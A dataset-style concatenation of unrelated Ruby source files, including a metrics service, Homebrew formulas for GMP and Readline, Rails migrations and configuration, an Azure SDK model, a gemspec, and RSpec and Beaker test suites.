.where("fill_progress IS NULL OR fill_progress = 0")
.where(award_type: award_type)
.count
cumulative_count = form_answers
.where("fill_progress IS NULL OR fill_progress >= 0 OR submitted_at IS NOT NULL")
.where(award_type: award_type)
.count
when "1-24-percent"
count = form_answers
.where("fill_progress > 0 AND fill_progress < 25")
.where(award_type: award_type)
.count
cumulative_count = form_answers
.where("fill_progress > 0 OR submitted_at IS NOT NULL")
.where(award_type: award_type)
.count
when "25-49-percent"
count = form_answers
.where("fill_progress >= 25 AND fill_progress < 50")
.where(award_type: award_type)
.count
cumulative_count = form_answers
.where("fill_progress >= 25 OR submitted_at IS NOT NULL")
.where(award_type: award_type)
.count
when "50-74-percent"
count = form_answers
.where("fill_progress >= 50 AND fill_progress < 75")
.where(award_type: award_type)
.count
cumulative_count = form_answers
.where("fill_progress >= 50 OR submitted_at IS NOT NULL")
.where(award_type: award_type)
.count
when "75-99-percent"
count = form_answers
.where("fill_progress >= 75 AND fill_progress < 100")
.where(award_type: award_type)
.count
cumulative_count = form_answers
.where("fill_progress >= 50 OR submitted_at IS NOT NULL")
.where(award_type: award_type)
.count
when "100-percent"
count = form_answers
.where("fill_progress = 100 OR submitted_at IS NOT NULL")
.where(award_type: award_type)
.count
cumulative_count = count
end
data = {
"_timestamp" => timestamp.iso8601,
"period" => "week",
"award" => award,
"stage" => stage,
"count" => count,
"cumulative_count" => cumulative_count
}
data["_id"] = generate_applications_id(data)
result << data
end
end
result
end
# "A SHA256 encoded concatenation of: _timestamp, period, channel, channel_type, (the dimensions of the data point)"
def self.generate_transactions_id(data)
string = ""
%w(_timestamp period channel channel_type).each do |attr|
string << data[attr]
end
md5(string)
end
# "A SHA256 encoded concatenation of: _timestamp, period, award, stage, i.e. (the dimensions of the data point)"
def self.generate_applications_id(data)
string = ""
%w(_timestamp period award stage).each do |attr|
string << data[attr]
end
md5(string)
end
def self.form_answers_for_past_week
AwardYear.current.form_answers
.where("created_at >= ?", (Time.current - 1.week).beginning_of_day)
.where("created_at < ?", Time.current.beginning_of_day)
end
def self.form_answers
AwardYear.current.form_answers
end
def self.md5(string)
md5 = Digest::MD5.new
md5.update(string)
md5.hexdigest
end
class << self
def log_this(message)
p "[PerformancePlatformService] #{Time.zone.now} #{message}"
end
end
end
| 26.654321 | 130 | 0.599815 |
bb196690a3d19914531473d3b4863a6ba872da76 | 302 | require_relative "graphic/context"
module Vamp
module Graphic
end
end
if __FILE__ == $0
g = Vamp::Graphic::Context.new(Vamp::Graphic::TextDotter.new(80, 20))
g.dot(10, 10)
g.line 1, 2, 70, 9
g.draw 40, 10, 100, 1
puts g.screen
puts "now we get an error:"
g.line 1, 1, 100, 100
end
| 16.777778 | 71 | 0.652318 |
5d05b875397c6ac3c9cafe522001ebfeeffd178b | 1,637 | class Gmp < Formula
desc "GNU multiple precision arithmetic library"
homepage "https://gmplib.org/"
url "http://ftpmirror.gnu.org/gmp/gmp-6.0.0a.tar.bz2"
mirror "https://gmplib.org/download/gmp/gmp-6.0.0a.tar.bz2"
mirror "https://ftp.gnu.org/gnu/gmp/gmp-6.0.0a.tar.bz2"
sha256 "7f8e9a804b9c6d07164cf754207be838ece1219425d64e28cfa3e70d5c759aaf"
bottle do
cellar :any
sha256 "616e465ea6c792e41c9870071128a42ad3db0988f678c4a27b9aa4aa60071abb" => :el_capitan
sha1 "93ad3c1a012806518e9a128d6eb5b565b4a1771d" => :yosemite
sha1 "bfaab8c533af804d4317730f62164b9c80f84f24" => :mavericks
sha1 "99dc6539860a9a8d3eb1ac68d5b9434acfb2d846" => :mountain_lion
sha1 "466b7549553bf0e8f14ab018bd89c48cbd29a379" => :lion
sha1 "c07dc7381816102a65f8602dfb41c43d9382fbac" => :x86_64_linux
end
option "32-bit"
option :cxx11
def install
ENV.cxx11 if build.cxx11?
args = ["--prefix=#{prefix}", "--enable-cxx"]
if build.build_32_bit?
ENV.m32
args << "ABI=32"
end
# https://github.com/Homebrew/homebrew/issues/20693
args << "--disable-assembly" if build.build_32_bit? || build.bottle?
system "./configure", *args
system "make"
system "make", "check" unless OS.linux? # Fails without LD_LIBRARY_PATH
ENV.deparallelize
system "make", "install"
end
test do
(testpath/"test.c").write <<-EOS.undent
#include <gmp.h>
int main()
{
mpz_t integ;
mpz_init (integ);
mpz_clear (integ);
return 0;
}
EOS
system ENV.cc, "test.c", "-L#{lib}", "-lgmp", "-o", "test"
system "./test"
end
end
| 28.719298 | 92 | 0.673183 |
217fba53f804f6f201b64401e75bc0d2f7ba23dc | 567 | # frozen_string_literal: true
RSpec.describe CreateAccountInlineJob do
let(:account) { FactoryBot.create(:account) }
describe '#perform' do
it 'calls other jobs synchronously' do
expect(CreateSolrCollectionJob).to receive(:perform_now).with(account)
expect(CreateFcrepoEndpointJob).to receive(:perform_now).with(account)
expect(CreateRedisNamespaceJob).to receive(:perform_now).with(account)
expect(CreateDefaultAdminSetJob).not_to receive(:perform_now) # now in callback
described_class.perform_now(account)
end
end
end
| 35.4375 | 85 | 0.761905 |
263ae52cad043e03ca74695699ba2827fac16b0f | 161 | class MakePlaylistDescriptionsLonger < ActiveRecord::Migration
def self.up
change_column(:playlists, :description, :text)
end
def self.down
end
end
| 17.888889 | 62 | 0.757764 |
7ac893c480eb6bb991b16cb67c19a68abbaaa699 | 9,401 | ActiveAdmin.setup do |config|
# == Site Title
#
# Set the title that is displayed on the main layout
# for each of the active admin pages.
#
config.site_title = 'Wedding'
# Set the link url for the title. For example, to take
# users to your main site. Defaults to no link.
#
# config.site_title_link = "/"
# Set an optional image to be displayed for the header
# instead of a string (overrides :site_title)
#
# Note: Aim for an image that's 21px high so it fits in the header.
#
# config.site_title_image = "logo.png"
# == Default Namespace
#
# Set the default namespace each administration resource
# will be added to.
#
# eg:
# config.default_namespace = :hello_world
#
# This will create resources in the HelloWorld module and
# will namespace routes to /hello_world/*
#
# To set no namespace by default, use:
# config.default_namespace = false
#
# Default:
# config.default_namespace = :admin
#
# You can customize the settings for each namespace by using
# a namespace block. For example, to change the site title
# within a namespace:
#
# config.namespace :admin do |admin|
# admin.site_title = "Custom Admin Title"
# end
#
# This will ONLY change the title for the admin section. Other
# namespaces will continue to use the main "site_title" configuration.
# == User Authentication
#
# Active Admin will automatically call an authentication
# method in a before filter of all controller actions to
# ensure that there is a currently logged in admin user.
#
# This setting changes the method which Active Admin calls
# within the application controller.
config.authentication_method = :authenticate_admin_user!
# == User Authorization
#
# Active Admin will automatically call an authorization
# method in a before filter of all controller actions to
# ensure that there is a user with proper rights. You can use
# CanCanAdapter or make your own. Please refer to documentation.
# config.authorization_adapter = ActiveAdmin::CanCanAdapter
# In case you prefer Pundit over other solutions you can here pass
# the name of default policy class. This policy will be used in every
# case when Pundit is unable to find suitable policy.
# config.pundit_default_policy = "MyDefaultPunditPolicy"
# You can customize your CanCan Ability class name here.
# config.cancan_ability_class = "Ability"
# You can specify a method to be called on unauthorized access.
# This is necessary in order to prevent a redirect loop which happens
# because, by default, user gets redirected to Dashboard. If user
# doesn't have access to Dashboard, he'll end up in a redirect loop.
# Method provided here should be defined in application_controller.rb.
# config.on_unauthorized_access = :access_denied
# == Current User
#
# Active Admin will associate actions with the current
# user performing them.
#
# This setting changes the method which Active Admin calls
# (within the application controller) to return the currently logged in user.
config.current_user_method = :current_admin_user
# == Logging Out
#
# Active Admin displays a logout link on each screen. These
# settings configure the location and method used for the link.
#
# This setting changes the path where the link points to. If it's
# a string, the strings is used as the path. If it's a Symbol, we
# will call the method to return the path.
#
# Default:
config.logout_link_path = :destroy_admin_user_session_path
# This setting changes the http method used when rendering the
# link. For example :get, :delete, :put, etc..
#
# Default:
# config.logout_link_method = :get
# == Root
#
# Set the action to call for the root path. You can set different
# roots for each namespace.
#
# Default:
# config.root_to = 'dashboard#index'
# == Admin Comments
#
# This allows your users to comment on any resource registered with Active Admin.
#
# You can completely disable comments:
# config.comments = false
#
# You can change the name under which comments are registered:
# config.comments_registration_name = 'AdminComment'
#
# You can change the order for the comments and you can change the column
# to be used for ordering:
# config.comments_order = 'created_at ASC'
#
# You can disable the menu item for the comments index page:
# config.comments_menu = false
#
# You can customize the comment menu:
# config.comments_menu = { parent: 'Admin', priority: 1 }
# == Batch Actions
#
# Enable and disable Batch Actions
#
config.batch_actions = true
# == Controller Filters
#
# You can add before, after and around filters to all of your
# Active Admin resources and pages from here.
#
# config.before_action :do_something_awesome
# == Localize Date/Time Format
#
# Set the localize format to display dates and times.
# To understand how to localize your app with I18n, read more at
# https://github.com/svenfuchs/i18n/blob/master/lib%2Fi18n%2Fbackend%2Fbase.rb#L52
#
config.localize_format = :long
# == Setting a Favicon
#
# config.favicon = 'favicon.ico'
# == Meta Tags
#
# Add additional meta tags to the head element of active admin pages.
#
# Add tags to all pages logged in users see:
# config.meta_tags = { author: 'My Company' }
# By default, sign up/sign in/recover password pages are excluded
# from showing up in search engine results by adding a robots meta
# tag. You can reset the hash of meta tags included in logged out
# pages:
# config.meta_tags_for_logged_out_pages = {}
# == Removing Breadcrumbs
#
# Breadcrumbs are enabled by default. You can customize them for individual
# resources or you can disable them globally from here.
#
# config.breadcrumb = false
# == Create Another Checkbox
#
# Create another checkbox is disabled by default. You can customize it for individual
# resources or you can enable them globally from here.
#
# config.create_another = true
# == Register Stylesheets & Javascripts
#
# We recommend using the built in Active Admin layout and loading
# up your own stylesheets / javascripts to customize the look
# and feel.
#
# To load a stylesheet:
# config.register_stylesheet 'my_stylesheet.css'
#
# You can provide an options hash for more control, which is passed along to stylesheet_link_tag():
# config.register_stylesheet 'my_print_stylesheet.css', media: :print
#
# To load a javascript file:
# config.register_javascript 'my_javascript.js'
# == CSV options
#
# Set the CSV builder separator
# config.csv_options = { col_sep: ';' }
#
# Force the use of quotes
# config.csv_options = { force_quotes: true }
# == Menu System
#
# You can add a navigation menu to be used in your application, or configure a provided menu
#
# To change the default utility navigation to show a link to your website & a logout btn
#
# config.namespace :admin do |admin|
# admin.build_menu :utility_navigation do |menu|
# menu.add label: "My Great Website", url: "http://www.mygreatwebsite.com", html_options: { target: :blank }
# admin.add_logout_button_to_menu menu
# end
# end
#
# If you wanted to add a static menu item to the default menu provided:
#
# config.namespace :admin do |admin|
# admin.build_menu :default do |menu|
# menu.add label: "My Great Website", url: "http://www.mygreatwebsite.com", html_options: { target: :blank }
# end
# end
# == Download Links
#
# You can disable download links on resource listing pages,
# or customize the formats shown per namespace/globally
#
# To disable/customize for the :admin namespace:
#
# config.namespace :admin do |admin|
#
# # Disable the links entirely
# admin.download_links = false
#
# # Only show XML & PDF options
# admin.download_links = [:xml, :pdf]
#
# # Enable/disable the links based on block
# # (for example, with cancan)
# admin.download_links = proc { can?(:view_download_links) }
#
# end
# == Pagination
#
# Pagination is enabled by default for all resources.
# You can control the default per page count for all resources here.
#
# config.default_per_page = 30
#
# You can control the max per page count too.
#
# config.max_per_page = 10_000
# == Filters
#
# By default the index screen includes a "Filters" sidebar on the right
# hand side with a filter for each attribute of the registered model.
# You can enable or disable them for all resources here.
#
# config.filters = true
#
# By default the filters include associations in a select, which means
# that every record will be loaded for each association.
# You can enabled or disable the inclusion
# of those filters by default here.
#
# config.include_default_association_filters = true
# == Footer
#
# By default, the footer shows the current Active Admin version. You can
# override the content of the footer here.
#
# config.footer = 'my custom footer text'
# == Sorting
#
# By default ActiveAdmin::OrderClause is used for sorting logic
# You can inherit it with own class and inject it for all resources
#
# config.order_clause = MyOrderClause
end
| 31.97619 | 116 | 0.701627 |
08f13d68770fd2ba3afc4fc9423f2d0913a5f945 | 3,836 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::NetApp::Mgmt::V2019_11_01
module Models
#
# NetApp account patch resource
#
class NetAppAccountPatch
include MsRestAzure
# @return [String] Resource location
attr_accessor :location
# @return [String] Resource Id
attr_accessor :id
# @return [String] Resource name
attr_accessor :name
# @return [String] Resource type
attr_accessor :type
# @return [Hash{String => String}] Resource tags
attr_accessor :tags
# @return [String] Azure lifecycle management
attr_accessor :provisioning_state
# @return [Array<ActiveDirectory>] Active Directories
attr_accessor :active_directories
#
# Mapper for NetAppAccountPatch class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'netAppAccountPatch',
type: {
name: 'Composite',
class_name: 'NetAppAccountPatch',
model_properties: {
location: {
client_side_validation: true,
required: false,
serialized_name: 'location',
type: {
name: 'String'
}
},
id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
provisioning_state: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.provisioningState',
type: {
name: 'String'
}
},
active_directories: {
client_side_validation: true,
required: false,
serialized_name: 'properties.activeDirectories',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ActiveDirectoryElementType',
type: {
name: 'Composite',
class_name: 'ActiveDirectory'
}
}
}
}
}
}
}
end
end
end
end
| 28.842105 | 70 | 0.447341 |
2144ad3871b97d111c37c7ebdcd597348f3e59b3 | 2,337 | class Readline < Formula
desc "Library for command-line editing"
homepage "https://tiswww.case.edu/php/chet/readline/rltop.html"
url "https://ftp.gnu.org/gnu/readline/readline-8.0.tar.gz"
mirror "https://ftpmirror.gnu.org/readline/readline-8.0.tar.gz"
version "8.0.4"
sha256 "e339f51971478d369f8a053a330a190781acb9864cf4c541060f12078948e461"
%w[
001 d8e5e98933cf5756f862243c0601cb69d3667bb33f2c7b751fe4e40b2c3fd069
002 36b0febff1e560091ae7476026921f31b6d1dd4c918dcb7b741aa2dad1aec8f7
003 94ddb2210b71eb5389c7756865d60e343666dfb722c85892f8226b26bb3eeaef
004 b1aa3d2a40eee2dea9708229740742e649c32bb8db13535ea78f8ac15377394c
].each_slice(2) do |p, checksum|
patch :p0 do
url "https://ftp.gnu.org/gnu/readline/readline-8.0-patches/readline80-#{p}"
mirror "https://ftpmirror.gnu.org/readline/readline-8.0-patches/readline80-#{p}"
sha256 checksum
end
end
bottle do
cellar :any
sha256 "6ae1c8e7c783f32bd22c6085caa4d838fed7fb386da7e40ca47b87ec9b1237d6" => :catalina
sha256 "29f7102a730ab39c8312cad1e7e439f6da2a67c452ce2b3380581eb185a5d8e8" => :mojave
sha256 "896a3d50ce8962ba56e853bdd590fadeabc00ab36475d143d6c2bea5cc15bb28" => :high_sierra
sha256 "46da47db3da04b2f248e3cf2d6d14c55aa543555d1134f6cbbf07787a5bf0bd6" => :x86_64_linux
end
uses_from_macos "ncurses"
keg_only :shadowed_by_macos, "macOS provides BSD libedit"
uses_from_macos "ncurses"
def install
system "./configure", "--prefix=#{prefix}",
("--with-curses" unless OS.mac?)
args = []
args << "SHLIB_LIBS=-lcurses" unless OS.mac?
# There is no termcap.pc in the base system, so we have to comment out
# the corresponding Requires.private line.
# Otherwise, pkg-config will consider the readline module unusable.
inreplace "readline.pc", /^(Requires.private: .*)$/, "# \\1"
system "make", "install", *args
end
test do
(testpath/"test.c").write <<~EOS
#include <stdio.h>
#include <stdlib.h>
#include <readline/readline.h>
int main()
{
printf("%s\\n", readline("test> "));
return 0;
}
EOS
system ENV.cc, "-L", lib, "test.c", "-L#{lib}", "-lreadline", "-o", "test"
assert_equal "test> Hello, World!\nHello, World!",
pipe_output("./test", "Hello, World!\n").strip
end
end
| 35.953846 | 94 | 0.712024 |
614cda5bde97f2b7d90fef481b48921622f414d9 | 1,754 | require 'rails_helper'
describe ScenarioImportsController do
let(:user) { users(:bob) }
before do
login_as(user)
end
it 'renders the import form' do
visit new_scenario_imports_path
expect(page).to have_text('Import a Public Scenario')
end
it 'requires a URL or file uplaod' do
visit new_scenario_imports_path
click_on 'Start Import'
expect(page).to have_text('Please provide either a Scenario JSON File or a Public Scenario URL.')
end
it 'imports a scenario that does not exist yet' do
visit new_scenario_imports_path
attach_file('Option 2: Upload a Scenario JSON File', File.join(Rails.root, 'data/default_scenario.json'))
click_on 'Start Import'
expect(page).to have_text('This scenario has a few agents to get you started. Feel free to change them or delete them as you see fit!')
expect(page).not_to have_text('This Scenario already exists in your system.')
check('I confirm that I want to import these Agents.')
click_on 'Finish Import'
expect(page).to have_text('Import successful!')
end
it 'asks to accept conflicts when the scenario was modified' do
DefaultScenarioImporter.seed(user)
agent = user.agents.where(name: 'Rain Notifier').first
agent.options['expected_receive_period_in_days'] = 9001
agent.save!
visit new_scenario_imports_path
attach_file('Option 2: Upload a Scenario JSON File', File.join(Rails.root, 'data/default_scenario.json'))
click_on 'Start Import'
expect(page).to have_text('This Scenario already exists in your system.')
expect(page).to have_text('9001')
check('I confirm that I want to import these Agents.')
click_on 'Finish Import'
expect(page).to have_text('Import successful!')
end
end
| 37.319149 | 139 | 0.730901 |
01891b5a65b80bb4df8419f66e0d1906d7d1aab9 | 206 | class RenameSearchQueryToStr < ActiveRecord::Migration[4.2]
def self.up
change_column :search_searches, :query, :text
rename_column :search_searches, :query, :str
end
def self.down
end
end
| 20.6 | 59 | 0.737864 |
3371f348de0661270db356c3754af137325c6547 | 558 | module VacancyScraper::NorthEastSchools
class Processor
attr_accessor :listing
def initialize
@listing = ListManager.new
end
def self.execute!
vacancies = Processor.new.listing
next_page = true
while next_page
vacancies.search_results.each do |url|
Rails.logger.info("Scraping #{url}")
Scraper.new(url).map!
end
next_page = vacancies.next_page
vacancies = next_page.present? ? ListManager.new(vacancies.next_page) : next_page = false
end
end
end
end
| 24.26087 | 97 | 0.650538 |
ff2f224abd65ccccb5e57756fa83358d497dcbde | 1,173 | Gem::Specification.new do |s|
s.name = 'logstash-mixin-aws'
s.version = '4.3.0'
s.licenses = ['Apache License (2.0)']
s.summary = "AWS mixins to provide a unified interface for Amazon Webservice"
s.description = "This gem is a Logstash plugin required to be installed on top of the Logstash core pipeline using $LS_HOME/bin/logstash-plugin install gemname. This gem is not a stand-alone program"
s.authors = ["Elastic"]
s.email = '[email protected]'
s.homepage = "http://www.elastic.co/guide/en/logstash/current/index.html"
s.require_paths = ["lib"]
# Files
s.files = Dir['lib/**/*','spec/**/*','vendor/**/*','*.gemspec','*.md','CONTRIBUTORS','Gemfile','LICENSE','NOTICE.TXT']
# Tests
s.test_files = s.files.grep(%r{^(test|spec|features)/})
# Gem dependencies
s.add_runtime_dependency "logstash-core-plugin-api", ">= 1.60", "<= 2.99"
s.add_runtime_dependency 'logstash-codec-plain'
s.add_runtime_dependency 'aws-sdk-v1', '>= 1.61.0'
s.add_runtime_dependency 'aws-sdk', '~> 2'
s.add_development_dependency 'logstash-devutils'
s.add_development_dependency 'timecop'
end
| 43.444444 | 205 | 0.658142 |
e9585fc58a4d5604c4b4361ce0fde6c3c1212aee | 596 | #! /usr/bin/env ruby -S rspec
require 'spec_helper_acceptance'
describe 'localrepos' do
it 'should have packages cached' do
shell('yum --disablerepo="*" --enablerepo="base_local" list available') do |cmd|
cmd.stdout.should =~ /irssi/
cmd.exit_code.should == 0
end
shell('yum --disablerepo="*" --enablerepo="epel_local" list available') do |cmd|
cmd.stdout.should =~ /rubygem-sinatra/
cmd.exit_code.should == 0
end
shell('yum --disablerepo="*" --enablerepo="updates_local" list available') do |cmd|
cmd.exit_code.should == 0
end
end
end
| 29.8 | 87 | 0.65604 |
0850192910e9226ee35443f760e836727037a675 | 34,554 | require 'spec_helper'
module Beaker
describe Host do
let(:options) { @options ? @options : {} }
let(:platform) { @platform ? { :platform => @platform } : {} }
let(:host) { make_host( 'name', options.merge(platform) ) }
it 'creates a windows host given a windows config' do
@platform = 'windows'
expect( host ).to be_a_kind_of Windows::Host
end
it 'defaults to a unix host' do
expect( host ).to be_a_kind_of Unix::Host
end
it 'can be read like a hash' do
expect{ host['value'] }.to_not raise_error
end
it 'can be written like a hash' do
host['value'] = 'blarg'
expect( host['value'] ).to be === 'blarg'
end
describe "host types" do
let(:options) { Beaker::Options::OptionsHash.new }
it "can be a pe host" do
options['type'] = 'pe'
expect(host.is_pe?).to be_truthy
expect(host.use_service_scripts?).to be_truthy
expect(host.is_using_passenger?).to be_truthy
expect(host.graceful_restarts?).to be_falsy
end
it "can be a foss-source host" do
expect(host.is_pe?).to be_falsy
expect(host.use_service_scripts?).to be_falsy
expect(host.is_using_passenger?).to be_falsy
end
it "can be a foss-package host" do
options['use-service'] = true
expect(host.is_pe?).to be_falsy
expect(host.use_service_scripts?).to be_truthy
expect(host.is_using_passenger?).to be_falsy
expect(host.graceful_restarts?).to be_falsy
end
it "can be a foss-packaged host using passenger" do
host.uses_passenger!
expect(host.is_pe?).to be_falsy
expect(host.use_service_scripts?).to be_truthy
expect(host.is_using_passenger?).to be_truthy
expect(host.graceful_restarts?).to be_truthy
end
it 'can be an AIO host' do
options['type'] = 'aio'
expect(host.is_pe?).to be_falsy
expect(host.use_service_scripts?).to be_falsy
expect(host.is_using_passenger?).to be_falsy
end
it 'sets the paths correctly for an AIO host' do
options['type'] = 'aio'
expect(host['puppetvardir']).to be_nil
end
end
describe "uses_passenger!" do
it "sets passenger property" do
host.uses_passenger!
expect(host['passenger']).to be_truthy
expect(host.is_using_passenger?).to be_truthy
end
it "sets puppetservice" do
host.uses_passenger!('servicescript')
expect(host['puppetservice']).to eq('servicescript')
end
it "sets puppetservice to apache2 by default" do
host.uses_passenger!
expect(host['puppetservice']).to eq('apache2')
end
end
describe "graceful_restarts?" do
it "is true if graceful-restarts property is set true" do
options['graceful-restarts'] = true
expect(host.graceful_restarts?).to be_truthy
end
it "is false if graceful-restarts property is set false" do
options['graceful-restarts'] = false
expect(host.graceful_restarts?).to be_falsy
end
it "is false if is_pe and graceful-restarts is nil" do
options['type'] = 'pe'
expect(host.graceful_restarts?).to be_falsy
end
it "is true if is_pe and graceful-restarts is true" do
options['type'] = 'pe'
options['graceful-restarts'] = true
expect(host.graceful_restarts?).to be_truthy
end
it "falls back to passenger property if not pe and graceful-restarts is nil" do
host.uses_passenger!
expect(host.graceful_restarts?).to be_truthy
end
end
describe "windows hosts" do
describe "install_package" do
let(:cygwin) { 'setup-x86.exe' }
let(:cygwin64) { 'setup-x86_64.exe' }
let(:package) { 'foo' }
context "testing osarchitecture" do
context "64 bit" do
before do
@platform = Beaker::Platform.new('windows-2008r2-64')
end
it "uses 64 bit cygwin" do
expect( host ).to receive(:execute).with(/#{cygwin64}.*#{package}/)
host.install_package(package)
end
end
context "32 bit" do
before do
@platform = Beaker::Platform.new('windows-10ent-32')
end
it "uses 32 bit cygwin" do
expect( host ).to receive(:execute).with(/#{cygwin}.*#{package}/)
host.install_package(package)
end
end
end
end
end
describe "#add_env_var" do
it "does nothing if the key/value pair already exists" do
result = Beaker::Result.new(host, '')
result.exit_code = 0
expect( Beaker::Command ).to receive(:new).with("grep ^key=.*\\/my\\/first\\/value ~/.ssh/environment")
expect( host ).to receive(:exec).once.and_return(result)
host.add_env_var('key', '/my/first/value')
end
it "adds new line to environment file if no env var of that name already exists" do
result = Beaker::Result.new(host, '')
result.exit_code = 1
expect( Beaker::Command ).to receive(:new).with("grep ^key=.*\\/my\\/first\\/value ~/.ssh/environment")
expect( host ).to receive(:exec).and_return(result)
expect( Beaker::Command ).to receive(:new).with(/grep \^key= ~\/\.ssh\/environment/)
expect( host ).to receive(:exec).and_return(result)
expect( Beaker::Command ).to receive(:new).with("echo \"key=/my/first/value\" >> ~/.ssh/environment")
host.add_env_var('key', '/my/first/value')
end
it "updates existing line in environment file when adding additional value to existing variable" do
result = Beaker::Result.new(host, '')
result.exit_code = 1
expect( Beaker::Command ).to receive(:new).with("grep ^key=.*\\/my\\/first\\/value ~/.ssh/environment")
expect( host ).to receive(:exec).and_return(result)
result = Beaker::Result.new(host, '')
result.exit_code = 0
expect( Beaker::Command ).to receive(:new).with(/grep \^key= ~\/\.ssh\/environment/)
expect( host ).to receive(:exec).and_return(result)
expect( Beaker::SedCommand ).to receive(:new).with('unix', 's/^key=/key=\\/my\\/first\\/value:/', '~/.ssh/environment')
host.add_env_var('key', '/my/first/value')
end
end
describe "#delete_env_var" do
it "deletes env var" do
expect( Beaker::SedCommand ).to receive(:new).with('unix', '/key=\\/my\\/first\\/value$/d', '~/.ssh/environment')
expect( Beaker::SedCommand ).to receive(:new).with("unix", "s/key=\\(.*\\)[;:]\\/my\\/first\\/value/key=\\1/", "~/.ssh/environment")
expect( Beaker::SedCommand ).to receive(:new).with("unix", "s/key=\\/my\\/first\\/value[;:]/key=/", "~/.ssh/environment")
host.delete_env_var('key', '/my/first/value')
end
end
describe "executing commands" do
let(:command) { Beaker::Command.new('ls') }
let(:host) { Beaker::Host.create('host', {}, make_host_opts('host', options.merge(platform))) }
let(:result) { Beaker::Result.new(host, 'ls') }
before :each do
result.stdout = 'stdout'
result.stderr = 'stderr'
logger = double(:logger)
allow( logger ).to receive(:host_output)
allow( logger ).to receive(:debug)
allow( logger ).to receive(:with_indent) { |&block| block.call }
host.instance_variable_set :@logger, logger
conn = double(:connection)
allow( conn ).to receive(:execute).and_return(result)
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.instance_variable_set :@connection, conn
end
it 'takes a command object and a hash of options' do
result.exit_code = 0
expect{ host.exec(command, {}) }.to_not raise_error
end
it 'acts on the host\'s logger and connection object' do
result.exit_code = 0
expect( host.instance_variable_get(:@logger) ).to receive(:debug).at_least(1).times
expect( host.instance_variable_get(:@connection) ).to receive(:execute).once
host.exec(command)
end
it 'returns the result object' do
result.exit_code = 0
expect( host.exec(command) ).to be === result
end
it 'logs the amount of time spent executing the command' do
result.exit_code = 0
expect(host.logger).to receive(:debug).with(/executed in \d\.\d{2} seconds/)
host.exec(command,{})
end
it 'raises a CommandFailure when an unacceptable exit code is returned' do
result.exit_code = 7
opts = { :acceptable_exit_codes => [0, 1] }
expect { host.exec(command, opts) }.to raise_error(Beaker::Host::CommandFailure)
end
it 'raises a CommandFailure when an unacceptable exit code is returned and the accept_all_exit_codes flag is set to false' do
result.exit_code = 7
opts = {
:acceptable_exit_codes => [0, 1],
:accept_all_exit_codes => false
}
expect { host.exec(command, opts) }.to raise_error(Beaker::Host::CommandFailure)
end
it 'does throw an error when an unacceptable exit code is returned and the accept_all_exit_codes flag is set' do
result.exit_code = 7
opts = {
:acceptable_exit_codes => [0, 1],
:accept_all_exit_codes => true
}
allow( host.logger ).to receive( :warn )
expect { host.exec(command, opts) }.to raise_error
end
it 'sends a warning when both :acceptable_exit_codes & :accept_all_exit_codes are set' do
result.exit_code = 1
opts = {
:acceptable_exit_codes => [0, 1],
:accept_all_exit_codes => true
}
expect( host.logger ).to receive( :warn ).with( /overrides/ )
expect { host.exec(command, opts) }.to_not raise_error
end
it 'explicitly closes the connection when :reset_connection is set' do
expect( host ).to receive( :close )
expect { host.exec(command, :reset_connection => true) }.to_not raise_error
end
context "controls the result objects logging" do
it "and passes a test if the exit_code doesn't match the default :acceptable_exit_codes of 0" do
result.exit_code = 0
expect{ host.exec(command,{}) }.to_not raise_error
end
it "and fails a test if the exit_code doesn't match the default :acceptable_exit_codes of 0" do
result.exit_code = 1
expect{ host.exec(command,{}) }.to raise_error
end
it "and passes a test if the exit_code matches :acceptable_exit_codes" do
result.exit_code = 0
expect{ host.exec(command,{:acceptable_exit_codes => 0}) }.to_not raise_error
end
it "and fails a test if the exit_code doesn't match :acceptable_exit_codes" do
result.exit_code = 0
expect{ host.exec(command,{:acceptable_exit_codes => 1}) }.to raise_error
end
it "and passes a test if the exit_code matches one of the :acceptable_exit_codes" do
result.exit_code = 127
expect{ host.exec(command,{:acceptable_exit_codes => [1,127]}) }.to_not raise_error
end
it "and passes a test if the exit_code matches one of the range of :acceptable_exit_codes" do
result.exit_code = 1
expect{ host.exec(command,{:acceptable_exit_codes => (0..127)}) }.to_not raise_error
end
end
end
describe "#mkdir_p" do
it "does the right thing on a bash host, identified as is_cygwin=true" do
@options = {:is_cygwin => true}
@platform = 'windows'
result = double
allow( result ).to receive( :exit_code ).and_return( 0 )
allow( host ).to receive( :exec ).and_return( result )
expect( Beaker::Command ).to receive(:new).with("mkdir -p test/test/test")
expect( host.mkdir_p('test/test/test') ).to be == true
end
it "does the right thing on a bash host, identified as is_cygwin=nil" do
@options = {:is_cygwin => nil}
@platform = 'windows'
result = double
allow( result ).to receive( :exit_code ).and_return( 0 )
allow( host ).to receive( :exec ).and_return( result )
expect( Beaker::Command ).to receive(:new).with("mkdir -p test/test/test")
expect( host.mkdir_p('test/test/test') ).to be == true
end
it "does the right thing on a non-bash host, identified as is_cygwin=false (powershell)" do
@options = {:is_cygwin => false}
@platform = 'windows'
result = double
allow( result ).to receive( :exit_code ).and_return( 0 )
allow( host ).to receive( :exec ).and_return( result )
expect( Beaker::Command ).to receive(:new).with("if not exist test\\test\\test (md test\\test\\test)")
expect( host.mkdir_p('test/test/test') ).to be == true
end
end
describe "#touch" do
it "generates the right absolute command for a windows host" do
@platform = 'windows'
expect( host.touch('touched_file') ).to be == "c:\\\\windows\\\\system32\\\\cmd.exe /c echo. 2> touched_file"
end
['centos','redhat'].each do |platform|
it "generates the right absolute command for a #{platform} host" do
@platform = platform
expect( host.touch('touched_file') ).to be == "/bin/touch touched_file"
end
end
it "generates the right absolute command for an osx host" do
@platform = 'osx'
expect( host.touch('touched_file') ).to be == "/usr/bin/touch touched_file"
end
end
